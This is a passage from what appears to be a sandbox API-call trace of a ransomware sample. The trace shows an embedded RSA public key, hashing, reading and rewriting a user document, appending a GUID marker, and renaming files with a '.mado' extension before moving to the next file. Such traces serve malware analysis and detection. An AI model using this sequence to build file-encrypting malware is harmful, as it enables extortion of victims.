KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.820] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.820] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.821] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.821] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.821] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.821] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.821] GetLastError () returned 0x0 [0205.821] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.821] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.821] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.821] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.821] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x185e0) returned 0x3b81690 [0205.822] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66930 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66978 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feac0 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.822] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feac0 | out: hHeap=0x2c0000) returned 1 [0205.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32feac0 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32feaa8 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72db0 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72ec8 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feac0 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.823] GetCurrentThreadId () returned 0x600 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69f68 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.824] GetCurrentThreadId () returned 0x600 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feac0 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fead8 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb20 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72db0 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb20 | out: hHeap=0x2c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72b80 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74b68 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fead8 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feac0 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66978 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.827] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x185de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.827] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.827] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.828] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.828] CloseHandle (hObject=0x63c) returned 1 [0205.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74b68 [0205.829] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\tAUHYQIWpbu.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\tauhyqiwpbu.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\tAUHYQIWpbu.rtf.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\tauhyqiwpbu.rtf.mado")) returned 1 [0205.830] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdb58950, ftCreationTime.dwHighDateTime=0x1d5e67b, ftLastAccessTime.dwLowDateTime=0xe384b8e0, ftLastAccessTime.dwHighDateTime=0x1d5d943, ftLastWriteTime.dwLowDateTime=0xe384b8e0, ftLastWriteTime.dwHighDateTime=0x1d5d943, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vXUpqISFwbSAR3N1vI", cAlternateFileName="VXUPQI~1")) returned 1 [0205.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0205.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0205.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d64f0 [0205.831] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92072ed0, ftCreationTime.dwHighDateTime=0x1d5e5a0, ftLastAccessTime.dwLowDateTime=0xccd8bb20, ftLastAccessTime.dwHighDateTime=0x1d5e11b, ftLastWriteTime.dwLowDateTime=0xccd8bb20, ftLastWriteTime.dwHighDateTime=0x1d5e11b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zdg8OGckRRHrHeJ5LXIg.odp", cAlternateFileName="ZDG8OG~1.ODP")) returned 1 [0205.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0205.831] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\zdg8OGckRRHrHeJ5LXIg.odp") returned=".odp" [0205.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\zdg8OGckRRHrHeJ5LXIg.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\zdg8ogckrrhrhej5lxig.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.831] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=16116) returned 1 [0205.831] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.833] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3ece, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.833] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.835] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x3ef4, lpOverlapped=0x0) returned 1 [0205.836] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.836] lstrlenA (lpString="-----BEGIN PUBLIC 